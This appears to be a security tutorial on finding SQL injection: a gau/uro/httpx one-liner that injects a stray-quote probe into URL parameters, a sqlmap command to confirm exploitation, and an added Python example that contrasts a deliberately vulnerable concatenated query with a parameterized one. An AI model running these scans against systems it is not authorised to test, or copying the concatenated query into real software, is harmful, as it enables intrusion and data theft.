How to find SQL Injection using a simple technique
Introduction:
In this article, I'll explore a simple way to find SQL injection and then dump the database with sqlmap.
Checking for SQL Injection Vulnerability:
1. We will use the one-liner bash command below:
$ echo "http://<target>/" | gau | uro | grep "\?" | sed "s/=.*/=A'/" | uniq > params.txt; cat params.txt | httpx -mr ".*SQL.*|.*syntax.*|.*error.*"
gau collects the known URLs for the target, uro removes duplicate patterns, grep keeps only URLs that carry a query string, and sed replaces the first parameter value (and everything after it) with the probe A', a stray single quote that breaks a query built by string concatenation. httpx then requests each URL and prints only those whose response matches the regex, i.e. responses that contain SQL, syntax or error text.
We now have a list of endpoints that may be vulnerable to SQL injection, so we move on to the next step.
2. Explore the endpoints.
Request each flagged endpoint and inspect the response: the database error text confirms which endpoints are actually vulnerable to SQL injection.
3. Exploit the vulnerable endpoints using sqlmap:
$ sqlmap -u "http://<target>/sqli?param=A" -p param --dbms=MSSQL --level 1 --risk 1 --banner
The --dbms value should match the backend identified from the error messages in step 2; if they point to a different database, change it (or omit it and let sqlmap fingerprint the backend).
sqlmap now retrieves the database banner, confirming that the SQL injection is exploitable.
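Why the A' probe surfaces these endpoints, shown from the application side as an added example (not code from the original article): a query built by string concatenation breaks on the stray quote and a leaky handler echoes the driver error into the response, while the bound-parameter version treats A' as plain data. Python with an in-memory sqlite3 table; the table, handler names and match pattern are constructed for illustration.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the target's backend."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO products (name) VALUES (?)", [("A",), ("B",)])
    return con


def handler_vulnerable(con, param):
    """Query text built by concatenation: the request value is parsed as SQL.
    The except block mirrors an app that echoes the driver error into the body."""
    sql = "SELECT name FROM products WHERE name = '" + param + "'"
    try:
        rows = con.execute(sql).fetchall()
        return 200, ", ".join(r[0] for r in rows)
    except sqlite3.Error as e:
        # A' turns the literal into 'A'' (unterminated), and the message leaks.
        return 500, f"{type(e).__name__}: {e}"


def handler_parameterized(con, param):
    """Bound parameter: the value is handed to the engine as data, never parsed."""
    rows = con.execute("SELECT name FROM products WHERE name = ?", (param,)).fetchall()
    return 200, ", ".join(r[0] for r in rows)


# The one-liner's httpx match rule, made case-insensitive so that driver class
# names such as sqlite3.OperationalError are caught as well as MySQL/MSSQL text.
ERROR_PATTERN = re.compile(r"SQL|syntax|error", re.IGNORECASE)


def flags_endpoint(handler, con, probe="A'"):
    """Send the probe the sed step produces and apply the match rule to the body."""
    _status, body = handler(con, probe)
    return bool(ERROR_PATTERN.search(body))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", handler_vulnerable(db, "A'"))
    print("parameterized:", handler_parameterized(db, "A'"))
    print("flagged:", flags_endpoint(handler_vulnerable, db),
          flags_endpoint(handler_parameterized, db))
```

Note that the three-word regex also matches harmless text such as a generic "internal error" page, which is why step 2's manual check of each flagged endpoint is needed before running sqlmap.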